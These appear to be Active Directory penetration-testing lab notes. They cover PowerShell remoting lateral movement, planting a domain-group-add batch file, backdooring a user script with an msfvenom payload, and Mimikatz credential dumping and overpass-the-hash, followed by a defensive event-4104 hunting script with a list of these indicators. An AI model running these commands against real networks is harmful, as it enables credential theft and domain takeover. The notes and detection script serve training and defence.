Using Find-LocalAdminAccess (PowerView) we can enumerate the machines in the domain on which the current user has local administrator rights, and via Enter-PSSession (PowerShell Remoting over WinRM) we can move laterally to those machines.
Enter-PSSession -ComputerName <servername>
Stateful session via Enter-PSSession (the session object survives after exiting, so it can be re-entered later)
$sess = New-PSSession -ComputerName <servername>
Enter-PSSession -Session $sess
Stateful commands via Invoke-Command (variables set in one call persist in the same session for later calls)
$sess = New-PSSession -ComputerName <servername>
Invoke-Command -Session $sess -ScriptBlock {$proc = Get-Process}
Invoke-Command -Session $sess -ScriptBlock {$proc.Name}
Write a file via script block (-ConfigurationName selects a custom, possibly constrained, session configuration on the target)
Invoke-Command -ComputerName <servername> -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}
Read, modify and write a file via script block (reads the script, rewrites one command with -replace, and writes the result to another path)
Invoke-Command -computername <servername> -ConfigurationName dc_manage -ScriptBlock {((cat "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\msfvenom.exe') | set-content -path c:\users\akash\Desktop\wm.ps1} -credential $cred
Command execution using -Command and -ScriptBlock (-Command is an alias of -ScriptBlock in Invoke-Command, so the two forms are equivalent)
Invoke-Command -ComputerName computer-name -ConfigurationName dc_manage -Credential $cred -Command {whoami}
Invoke-Command -ComputerName computer-name -ConfigurationName dc_manage -Credential $cred -ScriptBlock {whoami}
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -Command {whoami}
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami}
File execution using ScriptBlock (a bare quoted path is only echoed as a string; the call operator & is needed to run it)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {& "C:\temp\mimikatz.exe"}
File execution using FilePath (-FilePath reads a local .ps1 and runs its contents on the remote host; it does not copy or launch an executable, so a binary path here will not work)
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath "C:\temp\mimikatz.exe"
Mimikatz
Overpass-the-hash is an attack in which an adversary uses a user account's NTLM hash, rather than the plaintext password, to authenticate through the Kerberos authentication provider and obtain Kerberos tickets for that account.
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'
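On the defensive side, every command in these notes leaves a trace in PowerShell script block logging (event 4104) on the host where it runs. The script below is an added example, not part of the original notes: it reassembles 4104 fragments and flags the remoting and credential-dumping patterns listed above. It assumes script block logging is enabled; 'dc_manage' is the endpoint name from the notes and should be replaced with your own constrained endpoints.

```powershell
# Hunt PowerShell script block logs (event 4104) for the patterns shown in the notes.
# Assumes Script Block Logging is enabled; 'dc_manage' is the endpoint name from the notes.
param(
    [string]$ComputerName = $env:COMPUTERNAME,
    [datetime]$Since = (Get-Date).AddDays(-7)
)

$Indicators = @(
    'Invoke-Mimikatz',
    'sekurlsa::pth',
    'Find-LocalAdminAccess',
    'New-PSSession\s+-Computer',
    'Invoke-Command\s+.*-ConfigurationName\s+dc_manage',
    'net\s+group\s+\S+\s+\S+\s+/add\s+/domain',
    'Set-Content\s+-Path\s+.*Program Files'
)
$Pattern = ($Indicators -join '|')

function Test-ScriptBlockLogging {
    # Policy key written by the "Turn on PowerShell Script Block Logging" GPO setting.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $val = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    return ($val -eq 1)
}

function Get-SuspiciousScriptBlock {
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since }
    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue
    # 4104 splits long scripts into fragments. Properties: [0] fragment number,
    # [1] fragment total, [2] script text, [3] ScriptBlockId, [4] path. Reassemble by id.
    $events | Group-Object { $_.Properties[3].Value } | ForEach-Object {
        $parts = $_.Group | Sort-Object { [int]$_.Properties[0].Value }
        $text  = ($parts | ForEach-Object { $_.Properties[2].Value }) -join ''
        $hits  = [regex]::Matches($text, $Pattern, 'IgnoreCase') | ForEach-Object { $_.Value } | Select-Object -Unique
        if ($hits) {
            [pscustomobject]@{
                TimeCreated   = $parts[0].TimeCreated
                UserSid       = $parts[0].UserId
                ScriptBlockId = $_.Name
                Indicators    = ($hits -join ', ')
                Snippet       = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

if (-not (Test-ScriptBlockLogging)) {
    Write-Warning "Script block logging policy is not set on $env:COMPUTERNAME; results may be incomplete."
}
Get-SuspiciousScriptBlock | Sort-Object TimeCreated | Format-Table -AutoSize -Wrap
```

Run it with -ComputerName against the jump host or domain controller that exposes the constrained endpoint; a 4104 match for sekurlsa::pth or a net group /add /domain inside a remote session is worth an immediate look.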